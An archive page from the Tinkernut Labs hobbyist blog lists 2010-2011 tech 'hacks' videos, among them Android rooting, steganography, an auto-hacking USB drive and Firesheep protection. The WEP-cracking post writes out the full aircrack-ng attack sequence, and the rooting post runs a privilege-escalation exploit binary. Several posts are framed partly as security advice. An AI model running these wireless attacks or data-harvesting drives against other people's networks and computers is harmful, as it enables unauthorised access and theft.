Tinkernut Labs

  • Home
  • Projects
  • Blog
  • Store


  • How To Make A Hackintosh Using Virtualbox

    May 17, 2011 // davisde // Hacks 16 Responses



    In this episode, you will learn how to install Mac OSX Snow Leopard on a PC using Virtualbox. For this, you will need a retail copy of OSX. Otherwise, you can watch this video:

    This video will show you how to jailbreak your Verizon iPhone 4.2.6 using Greenpois0n 5.4

    Links:
    GreenPois0n – http://www.greenpois0n.com/
    Library of Congress Ruling – http://www.copyright.gov/1201/2010/Librarian-of-Congress-1201-Statement.html

  • Dual Boot Your Phone with Windows Mobile And Android

    February 7, 2011 // davisde // Featured Articles, Hacks 21 Responses


    If you want to repurpose an old Windows Mobile Phone that you may have lying around, you can convert it to an Android phone in a few simple steps.

    Links:

    Android Eclair for HTC Vogue – http://www.tinkernut.com/demos/269_dualboot/android_eclair_vogue.zip
    Gen.YDualBoot – http://forum.xda-developers.com/showthread.php?t=623792

    Popular Android Ports:
    NOTE- If your phone isn’t listed, just google your phone adding “android” after it.
    HTC Touch – http://sourceforge.net/apps/trac/androidhtc/
    iPhone – http://www.redmondpie.com/install-android-on-iphone-3g-2g-with-iphodroid
    Samsung i900, i910, i780, i907- http://andromnia.net/wiki/home

  • Print from your Cell Phone or iPad

    November 15, 2010 // davisde // Featured Articles, Hacks 71 Responses


    In this episode, we discover how to print to your home printer from anywhere using your mobile device, including most smartphones and the iPad.

    Google Cloud Print: http://code.google.com/apis/cloudprint/docs/overview.html
    Dropbox: http://www.dropbox.com
    Droppedbox (Windows Mobile): http://forum.xda-developers.com/showthread.php?t=687534
    E-print (for Windows): http://img.labnol.org/files/e-print.zip
    E-print (for Linux): http://www.labnol.org/software/print-files-on-linux/17841/
    E-print (for Mac): http://www.labnol.org/tech/print-files-on-remote-mac/17838/

  • FireSheep vs. Facebook

    November 8, 2010 // davisde // Hacks 9 Responses


    Firesheep is a hacking program that can steal the facebook and twitter accounts of anyone on a shared Wi-Fi connection. This video will show you how to protect yourself against that.

    Firesheep – http://codebutler.github.com/firesheep
    Idiocy – http://jonty.co.uk/idiocy
    Fireshepard – http://notendur.hi.is/~gas15/FireShepherd
    HTTPS Everywhere – https://www.eff.org/https-everywhere

  • Hacking Tip: How To Root An Android Phone

    September 21, 2010 // davisde // Featured Articles, Hacks 21 Responses






    In this episode, we will learn how to root an Android based phone.

    Jailbreaking your phone is now legal in the US

    COMMANDS:
    adb devices (This should list a device as a long number. If it doesnt something is wrong.)
    adb push c:\droid2root\rageagainstthecage-arm5.bin /data/local/tmp
    adb shell
    cd /data/local/tmp
    chmod 0755 rageagainstthecage-arm5.bin
    ./rageagainstthecage-arm5.bin (Be patient here. When finished it will return you to c:\droid2root)
    adb devices
    adb shell (you should now see a # instead of a $)
    mount -o remount,rw -t yaffs2 /dev/block/mtdblock4 /system
    exit
    adb push c:\droid2root\Superuser.apk /system/app
    adb push c:\droid2root\su /system/bin
    adb push c:\droid2root\busybox /system/bin
    adb shell
    chmod 4755 /system/bin/su
    chmod 4755 /system/bin/busybox
    mv /system/recovery-from-boot.p /system/recovery-from-boot.p.disabled
    mount -o ro,remount -t yaffs2 /dev/block/mtdblock4 /system
    rm /data/local/tmp/rageagainstthecage-arm5.bin
    exit

    Now reboot your phone. You should now be rooted!

    Android SDK – http://developer.android.com/sdk/index.html

    Droid2Root – http://www.megaupload.com/?d=XY4TFFOK

    Alternate Instructions – http://www.droidforums.net/forum/droid-labs/74028-root-droid-1-regardless-os-version.html

    Unroot – http://www.droidforums.net/forum/rescue-squad-guides/39254-sbf-root-unroot.html

    Apps for rooted phones –

    SetCPU – App used to overclock your device

    AdFree Android – remove ad’s

    ShootMe – Take screenshots simply by shaking your phone

    MeatMorph – Allows you to install custom themes

    Titanium Backup – Make custom backups of your phone, including Apps.

    Tutorials for rooted phones:

    Make A Custom Boot Animation –

    http://www.dkszone.net/how-to-create-custom-boot-animation-for

    Install Custom Fonts –

    http://www.gadgetsdna.com/custom-fonts-installation-on-rooted-android-device/696/

    Install Custom Themes –

    http://androiddelight.com/2010/07/17/delightful-theme-iron-man-for-rooted-droid/

  • Hack Google Voice For Free Calls

    July 7, 2010 // davisde // Hacks 20 Responses






    Learn how to make and receive unlimited VOIP phone calls using Google Voice and SipGate.

    http://www.sipgate.com
    http://voice.google.com

  • Hacking Tip: Hide Secret Files In Plain Sight

    May 12, 2010 // davisde // Hacks 5 Responses






    This video covers the art of steganography, or hiding messages in plain sight. The three methods covered are hiding files on Microsoft documents, hiding files inside pictures, and hiding messages inside Twitter messages.

    http://www.irongeek.com/i.php?…..stego-code

    http://sourceforge.net/project…..in-picture

    http://www.irongeek.com/i.php?…..stego-code

  • How To Make An Auto Hacking USB Drive

    February 10, 2010 // davisde // Hacks 24 Responses



    This video will show you how to make an auto-hacking USB drive and how to protect yourself from them.
    You can find all scripts at my forum post: http://www.tinkernut.com/forum/video-tutorial-help/how-to-make-an-auto-hacking-usb-drive
    U3 Universal customizer- http://www.u3community.com/viewtopic.php?t=434
    Batch to exe converter http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.html
    Nirsoft Utilities http://www.nirsoft.net

  • How To Hack Wireless

    January 27, 2010 // davisde // Hacks, Web Tips 51 Responses


    This video shows one method of hacking a wireless WEP connection and gives you some tips on how to better secure your wireless.

    WEBSITES:
    http://www.backtrack-linux.org
    http://www.imgburn.com

    TERMINAL COMMANDS:
    Startx
    /etc/init.d/networking start
    airmon-ng
    airmon-ng stop [wireless card name]
    airmon-ng start [wireless card name]
    airmon-ng
    airodump-ng [wireless card name]
    ctrl c
    airodump-ng w wep c [channel number] bssid [Bssid number] [wireless card name]
    aireplay-ng -1 0 a [bssid] [wireless card name]
    aireplay-ng -3 b [bssid][wireless card name]
    ctrl + c
    dir
    aircrack-ng [filename]

← Older posts
Newer posts →

Follow Us


  • Twitter
  • YouTube
  • Facebook

Recent Posts


  • Just got my new Pi Pico! January 26, 2021
  • New Raspberry Pi Microcontroller Announced!! January 21, 2021
  • Comments Show: DIY Vintage Spotify Streaming Radio June 3, 2017
  • DIY Vintage Spotify Radio Using A Raspberry Pi May 27, 2017
  • Comments Show: Raspberry Pi Radio Build May 20, 2017

Terms and Conditions - Privacy Policy